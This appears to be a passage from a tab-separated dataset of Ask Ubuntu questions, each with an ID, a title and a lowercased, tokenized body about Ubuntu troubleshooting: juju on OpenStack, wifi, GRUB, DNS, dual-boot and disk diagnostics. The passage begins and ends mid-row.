stub file , should be edited when needed , # used by default by dkms . ls : can not access /etc/x11/xorg.conf : no such file or directory direct rendering : yes server glx vendor string : sgi client glx vendor string : mesa project and sgi opengl vendor string : vmware , inc. [ 2079.438 ] ( ii ) loadmodule : `` extmod '' [ 2079.441 ] ( ii ) loadmodule : `` dbe '' [ 2079.442 ] ( ii ) loadmodule : `` glx '' [ 2079.443 ] ( ii ) loadmodule : `` record '' [ 2079.444 ] ( ii ) loadmodule : `` dri '' [ 2079.445 ] ( ii ) loadmodule : `` dri2 '' [ 2079.446 ] ( ii ) loadmodule : `` intel '' [ 2079.446 ] ( ii ) loadmodule : `` vesa '' [ 2079.447 ] ( ii ) loadmodule : `` fbdev '' [ 2079.478 ] ( ii ) loadmodule : `` fbdevhw '' [ 2079.479 ] ( ii ) loadmodule : `` vbe '' [ 2079.480 ] ( ii ) loadmodule : `` int10 '' [ 2079.506 ] ( ii ) loadmodule : `` ddc '' [ 2079.562 ] ( ii ) loadmodule : `` shadow '' [ 2079.562 ] ( ii ) loadmodule : `` fb '' [ 2079.563 ] ( ii ) loadmodule : `` int10 '' [ 2079.655 ] ( ii ) loadmodule : `` evdev '' [ 2079.682 ] ( ii ) loadmodule : `` synaptics ''
262322	juju deployment with openstack . environment starts - instances not	i want to buld a juju deployment on an openstack cloud . an environment type ec2 works , but i want to use the environment type openstack_s3 , which does not work . hera are some details : ubuntu 12.04 server openstack ( without swift ) installed from the ubuntu repos . my environment : juju : environments default : s3 environments : s3 : type : openstack_s3 control-bucket : juju- ... admin-secret : 1a15743cab5 ... combined-key : 6cfba71eec6 ... secret-key : d82e45f647074 ... ec2-uri : http : //ip:8773/services/cloud s3-uri : http : //ip:3333 default-series : precise default-image-id : fb2ba7a7 ... auth-url : http : //ip:5000/v2.0/ username : openstack user password : openstack user-pass project-name : openstack-project the juju bootstrap is ok , the first instance started and i can ssh it . if i deploy a service , an new instance should be started but nothing happens in the openstack dashboard . this is the output of juju status : machines : 0 : agent-state : running dns-name : 192.168.x.x instance-id : ca659b15 ... instance-state : running 1 : instance-id : pending services : wordpress : charm : cs : precise/wordpress-10 relations : loadbalancer : - wordpress units : wordpress/0 : agent-state : pending machine : 1 public-address : null i got only this error in the provision-agent.log on the bootstrap-node , but it doesent helped me so far . ubuntu @ juju-s3-instance-0 : ~ $ cat /var/log/juju/ machine-agent.log provision-agent.log ubuntu @ juju-s3-instance-0 : ~ $ cat /var/log/juju/provision-agent.log 2013-02-28 12:20:39,008 : twisted @ error : unhandled error in deferred : 2013-02-28 12:20:39,115 : twisted @ error : unhandled error traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 391 , in errback self._startruncallbacks ( fail ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 458 , in _startruncallbacks self._runcallbacks ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 545 , in _runcallbacks current.result = callback ( current.result , *args , **kw ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1095 , in gotresult _inlinecallbacks ( r , g , deferred ) -- - -- - file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/agents/base.py '' , line 245 , in startservice yield self.start ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/agents/provision.py '' , line 36 , in start self.environment = yield self.configure_environment ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1037 , in _inlinecallbacks result = result.throwexceptionintogenerator ( g ) file `` /usr/lib/python2.7/dist-packages/twisted/python/failure.py '' , line 382 , in throwexceptionintogenerator return g.throw ( self.type , self.value , self.tb ) file `` /usr/lib/python2.7/dist-packages/juju/agents/provision.py '' , line 88 , in configure_environment environment = yield watch_d file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1039 , in _inlinecallbacks result = g.send ( result ) file `` /usr/lib/python2.7/dist-packages/juju/agents/provision.py '' , line 92 , in configure_environment config.parse ( environment_data ) file `` /usr/lib/python2.7/dist-packages/juju/environment/config.py '' , line 138 , in parse config = schema.coerce ( config , [ ] ) file `` /usr/lib/python2.7/dist-packages/juju/lib/schema.py '' , line 266 , in coerce new_dict [ k ] = self.schema [ k ] .coerce ( v , path ) file `` /usr/lib/python2.7/dist-packages/juju/lib/schema.py '' , line 233 , in coerce new_subvalue = self.value_schema.coerce ( subvalue , value_path ) file `` /usr/lib/python2.7/dist-packages/juju/lib/schema.py '' , line 301 , in coerce return self.schemas [ selected ] .coerce ( value , path ) exceptions.keyerror : 'openstack_s3' can anyone give me an advice , where i can locate the problem ? thank you !
262324	internet on wireless does n't work without charger	my laptop is running on ubuntu 12.04 . since last few days , i am facing a strange problem ( some may even call me crazy after reading this ) . my laptop is acer aspire 5755 ( specifications - just in case ) wi-fi on my laptop is always on both in office and at home . at home , there are no issues with internet connectivity . however in office , internet works only when my charger is plugged in . i have tested in dozens of times to ensure it was n't a one off thing . at home , internet works fine with or without charger plugged in so it does n't seem like it 's an issue with the wireless card not getting enough power . it could have been an issue with the specific power switch on my desk but i tried it with several other switches in office and the problem persists . any help would be appreciated . [ update ] added o/p of powertop command with device tabs selected . this is from office , will upload the o/p from home as well later today once i get back home . powertop 1.97 overview idle stats frequency stats device stats tunables usage device name 12.6 % cpu use 100.0 % audio codec hwc0d0 : realtek 100.0 % display backlight 100.0 % display backlight 495.2 pkts/s network interface : eth3 ( wl ) 100.0 % radio device : wl 100.0 % usb device : samsung android usb device ( samsung electronics co. , ltd. ) 100.0 % radio device : acer-wmi 100.0 % pci device : intel corporation 6 series/c200 series chipset family pci express root port 4 100.0 % usb device : usb-device-8087-0024 100.0 % pci device : broadcom corporation netlink bcm57785 gigabit ethernet pcie 100.0 % usb device : ehci host controller 100.0 % pci device : broadcom corporation netxtreme bcm57765 memory card reader 100.0 % pci device : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 100.0 % pci device : intel corporation 2nd generation core processor family dram controller 100.0 % pci device : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller 100.0 % pci device : broadcom corporation bcm43227 802.11b/g/n 100.0 % pci device : intel corporation 2nd generation core processor family integrated graphics controller 100.0 % pci device : intel corporation 6 series/c200 series chipset family mei controller # 1 100.0 % pci device : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 100.0 % pci device : intel corporation 6 series/c200 series chipset family high definition audio controller 100.0 % pci device : intel corporation 6 series/c200 series chipset family pci express root port 1 100.0 % pci device : intel corporation 6 series/c200 series chipset family pci express root port 2 100.0 % pci device : nec corporation upd720200 usb 3.0 host controller 0.0 % usb device : ehci host controller 0.0 % usb device : xhci host controller 0.0 % usb device : xhci host controller 0.0 % usb device : usb-device-8087-0024 0.0 % usb device : 1.3m hd webcam ( brb6g1nm1 ) 0.0 % audio codec hwc0d3 : intel 0.0 % radio device : acer-wmi 0.0 pkts/s network interface : eth1 ( tg3 )
262327	how do i make a disc image with all files and apps ?	ok , i wiped my hd , installed 12.04 , installed all my apps , music , etc and have my os exactly where i want it and would like to make an exact bootable image of everything to a 32g thumb drive so that i can install it to another hd and be up and running with all my stuff if anything ever happens to my current hd . this is giving me problems . i ca n't even find the iso file much less anything else . i would really appreciate a walk-through on this one . thank you .
262334	how can i make a kde app ( okular ) register its actions with zeitgeist ?	i do n't really enjoy evince , and i use okular for my pdf needs . okular is nice , but when i open a document with it , it 's not added to my recent documents , nor appear in the fast dash file search ( it does appear after a while when the locate search is activated ) . i expect okular to register his things with nepomuk instead of zeitgeist . is it possible to get either okular or nepomuk give that info to zeitgeist ?
262337	booting from network	is it possible to boot ( without actually installing it ) ubuntu and run ubuntu desktop image via pxe like a live cd ? i do n't want the session to actually preserve state . each boot should be fresh and alike . is it possible to achieve this via pxe boot . also when a machine is booted via pxe , after the os has loaded , which machine 's resources does the os consume ? the client 's or the pxe server 's ? i believe it should be latter .
262341	how do i install the qtwebkit 3.0 module for qt creator ?	i 'm trying to add a webview to my project , but the module is n't installed . i 'm new to qml and qt and i 'm not sure how to install the module . thanks
262343	desktop not working after removing unity 11.10	in ubuntu 11.10 on a macbook pro 7.1 i just removed unity and installed back gnome , everything is working perfectly but the desktop . looks like i ca n't right-click on it , ( while i can on panels and menu ) , not even with ctrl+alt+right-click and if i $ touch something , it creates something but it does not appear in desktop view ( the one with background ) . it 's not fundamental but would be nice : ) thanks ps : i know it 's probably a common issue and i searched but its rather difficult to find something , since all keywords refers also to gnome-desktop , and install only related issues are shown : /
262352	dns lookup ignores aaaa ( ipv6 ) in favor of a ( ipv4 )	when i attempt resolve a name that is listed with both record types the os returns the a record . a trace shows that the aaaa record is returned first followed by a but the application ( apache based http get , nslookup or dig ) always returns the v4 address . i running a dual stack , single nic machine with ubuntu 12.04.1 lts . my network is v4 locally and v6 only to the internet . my resolv.conf is configured with v6 ( google ) nameservers only and my gai.conf had no non-comment/blank lines which should use the default order . based on other postings i 've tried adding options inet6 to resolv.conf and these lines to gai.conf : label : :1/128 0 label : :/0 1 label 2002 : :/16 2 label : :/96 3 label : :ffff:0:0/96 4 label fec0 : :/10 5 label fc00 : :/7 6 # label 2001:0 : :/32 7 neither has changed the result . anyone have any idea what is going on ? thanks .
262358	why wo n't ubuntu boot with a series 5 ati along with the series 6 amd 's ?	my setup is as follows : 2 amd radeon hd 6900 series and a ati radeon hd 5670 xubuntu 12.04 64bit and in case it makes a difference my motherboard is a asus formula iv . the driver versions i have tried are the stable and beta off the downloads page for amd graphics , 13.1 and 13.2 beta , would a old version help ? if i remove the ati radeon hd 5670 then the system boots up fine and i can bitcoin mine for hours but if i add the extra card the system boots but x server is never loaded , graphically the loading screen just hangs but the system can be accessed over ssh .
262361	installing c - programming software	i have just installed ubuntu 12.10 , and i am new using linux . what software do i need to install to do c-programming ? i am looking for a compiler and libraries . i 'm not only new in linux , but also in c as you can see . i 've learned to install compiler using sudo apt-get install g++ . and `` hello world '' works just fine . : ) i guess it contains all basic libraries , but how do i install additional ones ? especially i need grace .
262362	how to install windows 7 with ubuntu 12.04 ( ubuntu pre-installed )	i want to learn how can i install windows 7 with my ubuntu 12.04 x64 side by side a.k.a . dual-boot . i searched over the internet . everywhere recommends and explains how to install ubuntu over windows 7 . my problem is i do n't want to format and lose my ubuntu data . i tried to install windows 7 ( ubuntu pre-installed ) in a virtual machine ( with virtualbox ) . it gave me an error : '' setup was unable to create a new system partition or locate an existing system partition . see the setup log files for more information . '' either installation process of windows 7 over pre-installed ubuntu with dual boot or how to backup and restore whole ubuntu system will solve my problem . ps : if it helps , my system has one 128 gb ssd ( sda ) which have ubuntu installed on it and one 1.0 tb hard disc ( sdb ) . sda has : sda1 ( linux , bootable , ext4 , / ) sda2 ( extended ) sda5 ( linux swap ) sdb has : sdb1 ( microsoft reserved partition ) sdb2 ( linux basic data partition , - , ntfs , /media/new volume ) sdb3 ( efi system partition , - , fat32 , not mounted ) sdb4 ( efi system partition , - , fat32 , not mounted ) sdb5 ( linux basic data partition , - ) sdb6 ( linux basic data partition , - , ntfs , /media/new volume 2 ) sdb7 ( swap space , linux swap partition )
262367	wo n't boot after graphic driver activation .	i 'm absolutely new to linux/ubuntu . i decided to give it a try after years of debate . i just installed ubuntu12.04 lts . on initial set up graphics are bad however everything else works great ( audio , wireless , etc ) . in settings i hit additional drivers and i get a huge list of updates to install which i do , then restart . then i do it again and get the drivers for graphics card and after that reboot , all i get is a black screen after a momentary purple screen . i do n't know how to troubleshoot or enter `` terminal '' to edit stuff so i just keep reinstalling . sos ! please help !
262368	is there any repository for installing php 5.2.x on ubuntu 12.04 ?	i would like to know if there is any repository i can add to install php5.2.9+ on ubuntu server 12.04 .
262370	will deleting stuff from the ubuntu partition ( directly ) increase free space on a windows xp partition ?	my system has dual boot : windows xp and ubuntu . accessing files and directories of windows xp from ubuntu is easy as well known . i deleted some files and directories in windows xp , let say in c : \foo.bar from ubuntu . when i boot to windows xp , i expected some more free disk space after some delete from ubuntu , but the free disk space is unchanged as nothing happened , but deleted files and directories from ubuntu have all gone . where is this space ? thank you . -paul
262373	why ca n't i change the wallpaper in gnome shell and unity ?	i 've just installed gnome shell and changed the theme and so on ; but i ca n't change the wallpaper . i 'm using the gnome control center to change the wallpaper but it does n't work even if i usegconftool and programs like wallch are n't working either . on unity it 's the same problem , but on unity i can change my wallpaper with compiz wallpaper changer plug-in . any ideas how to fix it ? i do n't know what program draws the background , but nautilus is n't . if i know which program it is i can try killing it to use wallch , but i have n't found any hints which program is used .
262375	is formatting a portable drive necessary for installing kubuntu ?	i have a toshiba 1tb portable back-up drive that i want to install kubuntu on . the question i have is should i reformat the drive ? and if so what file system ? i want to use the portable hd to boot up my laptop with it .
262381	remove 3.8.0-030800	i have a hp pavilion dv3-2150 ep with 12.10 x64 ubuntu . i do n't know much about ubuntu , but with some patience and google , everything 's possible ... yesterday i had a problem after an ( automatic ) update , my atheros wlan card did n't work ( i connect to the router , but have n't internet ) , so i google for some solutions ... after some possible solutions , i saw someone recomend to install 3.8.0 ( with issues , i was aware , from here : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1097334 ) . i allready tried to remove 3.8.0 linux-image ( saw here : removing old kernel entries in grub ) but still continues there . for now i have updated to 3.5.0.26 ( that solved wifi issue , but to enter ubuntu when i turn my pc on , i must keep shift key pressed , then choose 3.5.0.26 kernel . if i do not do that , ubuntu do n't work . another issue is that every time i turn ubuntu on , i must go to command line to turn wifi on ( i ca n't see wifi before do that ) . could you guys please help me with this 2 issues ? tanks ...
262389	dosemu crashes under lts 12.04	i just upgraded to ubuntu 12.04 lts from 10.04 . a dos application that previously ran under dosemu now crashes with only the message `` [ 4 ] exit 194 '' displayed in the window from which i started it . any suggestions on how i should debug this problem ? has there been a change to dosemu for 12.04 ? should i re-install dosemu ?
262390	how to lock grub2 default selection ?	this morning linux-image-3.5.0-26-generic was installed during a software update . on my laptop this proved to be unusable after 10 minutes . i changed to linux-image-3.5.0-24-generic and all seems fine . i have updated the default grub2 selection to the 24-generic . how can i lock the default grub selection to this value so subsequent updates do n't overwrite and make themselves default ?
262391	kde taskbar questions	1 ) how can i set minimized apps ' names on taskbar not to be gray ? ( ie they are always black ) 2 ) how can i make taskbar not transparent in default theme ? but other way than turning all desktops effects off .
262397	time out problem while installing wireshark	i am getting following error message when i am trying to install wireshark using : sudo apt-get install wireshark output : err http : //us.archive.ubuntu.com/ubuntu/ oneiric/universe libsmi2ldbl amd64 0.4.8+dfsg2-4 could not connect to 10.1.101.150:3128 ( 10.1.101.150 ) , connection timed out please help me to come out of this problem ...
262400	how can i automount virtualbox shares in a non-default mountpoint ?	i 'm trying to automount virtualbox shared folders in ubuntu , the sharenames are *_drive , whereas * is d , e , etc . to then share them again via samba . if i mount -t vboxsf d_drive /media/shares/d it works , but that 's of course only until the next reboot . so then i tried to mount them via fstab , which mounts them ( as i see in 'sudo mount ' ) but the mountpoints remain empty . i tried adding vboxsfv and vboxadd in /etc/modules/ but to no avail . i do , however , see that the vboxservice auto-mounts all shares to /media/sf_*_drive and they are available . it 's no problem to double mount a share though since i can manually mount them and they both work . while i could share all /media/sf_*_drive 's i 'd like to just share /media/shares/ which contains all mountpoints instead .
262401	does the windows installer replace windows or format the disk ?	when installing ubuntu 12.10 with the windows installer ( from windows 7 ) . does the installer just replace the windows `` software '' but keep all my files , or does it completely format the disk and delete all my files ? thanks , thomas
262402	ubuntu 12.10 no login screen after update ( vmware workstation 9 )	first post here . i have ubuntu 12.10 ( 32bit ) installed on vmware workstation version 9.0.0 build-812388 no problems during installation , no errors . i changed desktop environment to gnome-shell via `` software installer '' ( not command line ) . process went well no errors . after about 2 weeks , there were about 3 automatic software updates installed with no issues . about the fourth automatic software update , this one screws the whole thing out . when the update is done , it says the system is required to be restarted . i close everything out and click `` restart '' . booting back up , it goes through its normal process , shows the ubuntu logo , and then it sits there showing the ubuntu purple background . it does n't give me the login screen in order for me to enter the password . i can do ctrl+alt+f1 and get the black screen ( shell ? ) and it shows me the ubuntu login where i can log in just fine . i can go back by doing ctrl+alt+f7 and the same purple background is there , so the gui part is the one not working . the exact same issue has happen on 2 different hosts computers . both 64bit machines using windows 7 . anyone has any suggestions about this problem ? thank you in advance . -- nelson .
262403	where does one set the extent of the desktop in ubuntu ?	i would like to control the dimensions of my ubuntu desktop . currently the files i download onto the desktop do not seem visible , as the desktop extends well below what 's displayed on the screen . i have attached a screenshot where the filename of the bottom-most file ( and several files under that ) is cut off . is there a setting which i can change ? xrandr output :
262404	my newly created quickly app gets warnings on install	i 've created my very first , very simple app with quickly ( basically just followed the tutorial ) . but when i run the program i get warnings : /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `window ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `opendialog ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `jottywindow ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) /usr/lib/python2.7/dist-packages/gi/overrides/gtk.py:391 : warning : g_object_set_property : construct property `` type '' for object `removedialog ' ca n't be set after construction gtk.window.__init__ ( self , type=type , **kwds ) it does n't hinder the app , but if somebody know how to get rid of them it would be great . when i try to package the app with `` quickly package '' i get : simon @ simonsdesktop : ~/programing_with_quickly/jotty $ quickly package ... ... ... ubuntu packaging created in debian/ ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . command returned some warnings : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ** ( setup.py:9781 ) : warning ** : fel vid s채ndning av inloggningsuppgifter : fel vid s채ndning av meddelande : operationen inte till책ten -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ubuntu package has been successfully created in ../jotty_0.1_all.deb sorry about the sweedish , but it means `` error when sending account information : error when sending message : operation not allowed '' and when i try to install the app with the softwear center i get the following warning : lintian check results for /home/simon/programing_with_quickly/jotty_0.1_all.deb : use of uninitialized value $ env { `` home '' } in concatenation ( . ) or string at /usr/bin/lintian line 108 . e : jotty : maintainer-address-malformed unknown < unknown > and then it recommends not to install . ( but the app works great when i install it ! ) so , the question is , how to get rid of the warning ? is it only because the app has not been approved by canonical or is it something else ? thanks ! i 'm runing ubuntu 12.04
262408	i cant install programs on ubuntu error subprocess installed post-installation script returned error exit status 2	please help , i cant install or unistall programs the error is that : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 192274 files and directories currently installed . ) removing linux-image-extra-3.5.0-25-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic update-initramfs : deleting /boot/initrd.img-3.5.0-25-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic /usr/sbin/grub-probe : error : failed to get canonical path of /cow . run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.5.0-25-generic.postrm line 328. dpkg : error processing linux-image-extra-3.5.0-25-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-extra-3.5.0-25-generic error in function : setting up linux-image-3.5.0-25-generic ( 3.5.0-25.39 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) the link /initrd.img is a dangling linkto /boot/initrd.img-3.5.0-25-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic update-initramfs : generating /boot/initrd.img-3.5.0-25-generic cryptsetup : warning : failed to detect canonical device of overlayfs cryptsetup : warning : could not determine root device from /etc/fstab run-parts : executing /etc/kernel/postinst.d/pm-utils 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.5.0-25-generic /boot/vmlinuz-3.5.0-25-generic /usr/sbin/grub-probe : error : failed to get canonical path of /cow . run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.5.0-25-generic.postinst line 1010. dpkg : error processing linux-image-3.5.0-25-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2
262416	how do i mount a usb hard drive to an arbitrary mount point ?	i just upgraded my system with an ssd from a hard drive . loads faster . but , i left all of my large media files on my hard drive . currently , i have a sata optical bay caddy on order , but in the meantime i can only connect my hard drive through usb ( this is a laptop ) . i export the contents of this drive using nfs to my raspbmc htpc , and i 'd rather not go through the trouble of changing the mountpoints all over the place . currently , nfs exports /home/media as storing all of the media , and that 's where i 'd like to mount this hard drive . the point is , currently udev and the rest work together to mount my drive at /media/ $ user/media , but i 'd like to arbitrarily mount it at /home/media . and and like to be able to allow any user to unmount the device from the unity panel , as they would normally with a usb thumbdrive . having the mountpoint be consistent is important though , for nfs sake . i know there 's some kind of way with udev rules to specify this sort of thing , but i have n't been able to figure it out . in short , can i mount a usb hdd anywhere i like have it work as expected ?
262419	close all windows of the same application in gnome shell	as the title says , is there a shortcut to close all windows of the same application in gnome shell , or an extension to do this ? thanks .
262420	system very slow , trying to find the bottleneck	i have ubuntu 12.10 installed in sony viao e series vpceh16en , 4gb ram , 320 gb hdd , intel core i3-2310m processor 2.10ghz . it is a dual boot with windows7 alongside with it . i see the system is very slow in responding , any video gets stuck in between the play . can you please help me find where the bottleneck is . here is the output of hdparm and smartctl : -- -- -- -- -- -- - hdparm -- -- -- -- -- -- -- -- -- - anil @ anil-ubuntu : ~ $ sudo hdparm -tt /dev/sda6 /dev/sda6 : timing cached reads : 2 mb in 3.51 seconds = 584.17 kb/sec timing buffered disk reads : 160 mb in 3.02 seconds = 52.91 mb/sec anil @ anil-ubuntu : ~ $ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- smartctl -- -- -- -- -- -- -- -- - anil @ anil-ubuntu : ~ $ sudo smartctl -a /dev/sda6 smartctl 5.43 2012-06-30 r3573 [ x86_64-linux-3.5.0-25-generic ] ( local build ) copyright ( c ) 2002-12 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === device model : toshiba mk3265gsxn serial number : 419cd3x3b lu wwn device id : 5 000039 33ab02a3c firmware version : gh012h user capacity : 320,072,933,376 bytes [ 320 gb ] sector size : 512 bytes logical/physical device is : not in smartctl database [ for details use : -p showall ] ata version is : 8 ata standard is : exact ata specification draft version not indicated local time is : thu feb 28 23:08:07 2013 ist smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 120 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 95 ) minutes . sct capabilities : ( 0x003d ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000b 100 100 050 pre-fail always - 0 2 throughput_performance 0x0005 100 100 050 pre-fail offline - 0 3 spin_up_time 0x0027 100 100 001 pre-fail always - 1258 4 start_stop_count 0x0032 100 100 000 old_age always - 2560 5 reallocated_sector_ct 0x0033 100 100 050 pre-fail always - 47 7 seek_error_rate 0x000b 100 100 050 pre-fail always - 0 8 seek_time_performance 0x0005 100 100 050 pre-fail offline - 0 9 power_on_hours 0x0032 088 088 000 old_age always - 4940 10 spin_retry_count 0x0033 150 100 030 pre-fail always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 2553 191 g-sense_error_rate 0x0032 100 100 000 old_age always - 118 192 power-off_retract_count 0x0032 100 100 000 old_age always - 169 193 load_cycle_count 0x0032 099 099 000 old_age always - 13993 194 temperature_celsius 0x0022 100 100 000 old_age always - 43 ( min/max 20/47 ) 196 reallocated_event_count 0x0032 100 100 000 old_age always - 5 197 current_pending_sector 0x0032 100 100 000 old_age always - 0 198 offline_uncorrectable 0x0030 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 220 disk_shift 0x0002 100 100 000 old_age always - 19 222 loaded_hours 0x0032 091 091 000 old_age always - 3918 223 load_retry_count 0x0032 100 100 000 old_age always - 0 224 load_friction 0x0022 100 100 000 old_age always - 0 226 load-in_time 0x0026 100 100 000 old_age always - 245 240 head_flying_hours 0x0001 100 100 001 pre-fail offline - 0 smart error log version : 1 ata error count : 108 ( device log contains only the most recent five errors ) cr = command register [ hex ] fr = features register [ hex ] sc = sector count register [ hex ] sn = sector number register [ hex ] cl = cylinder low register [ hex ] ch = cylinder high register [ hex ] dh = device/head register [ hex ] dc = device command register [ hex ] er = error register [ hex ] st = status register [ hex ] powered_up_time is measured from power on , and printed as ddd+hh : mm : ss.sss where dd=days , hh=hours , mm=minutes , ss=sec , and sss=millisec . it `` wraps '' after 49.710 days . error 108 occurred at disk power-on lifetime : 3337 hours ( 139 days + 1 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 4a 6a 9d bb 64 error : wp at lba = 0x04bb9d6a = 79404394 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 61 08 58 f0 f6 b8 40 00 03:49:54.536 write fpdma queued 61 08 50 00 f7 b8 40 00 03:49:54.536 write fpdma queued 60 00 48 98 9c bb 40 00 03:49:54.535 read fpdma queued 61 38 40 c8 0b b9 40 00 03:49:54.535 write fpdma queued 61 02 38 88 3a 39 40 00 03:49:54.535 write fpdma queued error 107 occurred at disk power-on lifetime : 3337 hours ( 139 days + 1 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 f2 6a 9d bb 64 error : wp at lba = 0x04bb9d6a = 79404394 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 61 08 f8 68 c9 65 40 00 03:49:50.336 write fpdma queued 60 00 f0 98 9c bb 40 00 03:49:50.335 read fpdma queued 61 08 e8 28 71 61 40 00 03:49:50.335 write fpdma queued 61 18 e0 08 c8 61 40 00 03:49:50.335 write fpdma queued 61 20 d8 d8 90 6c 40 00 03:49:50.335 write fpdma queued error 106 occurred at disk power-on lifetime : 3337 hours ( 139 days + 1 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 62 6a 9d bb 64 error : wp at lba = 0x04bb9d6a = 79404394 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 61 08 70 f8 f6 b8 40 00 03:49:46.159 write fpdma queued 61 08 68 08 f7 b8 40 00 03:49:46.159 write fpdma queued 60 00 60 98 9c bb 40 00 03:49:46.157 read fpdma queued 61 08 58 c0 0b b9 40 00 03:49:46.157 write fpdma queued 61 08 50 e8 38 62 40 00 03:49:46.157 write fpdma queued error 105 occurred at disk power-on lifetime : 3337 hours ( 139 days + 1 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 41 aa 6a 9d bb 64 error : wp at lba = 0x04bb9d6a = 79404394 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 61 08 00 28 87 7e 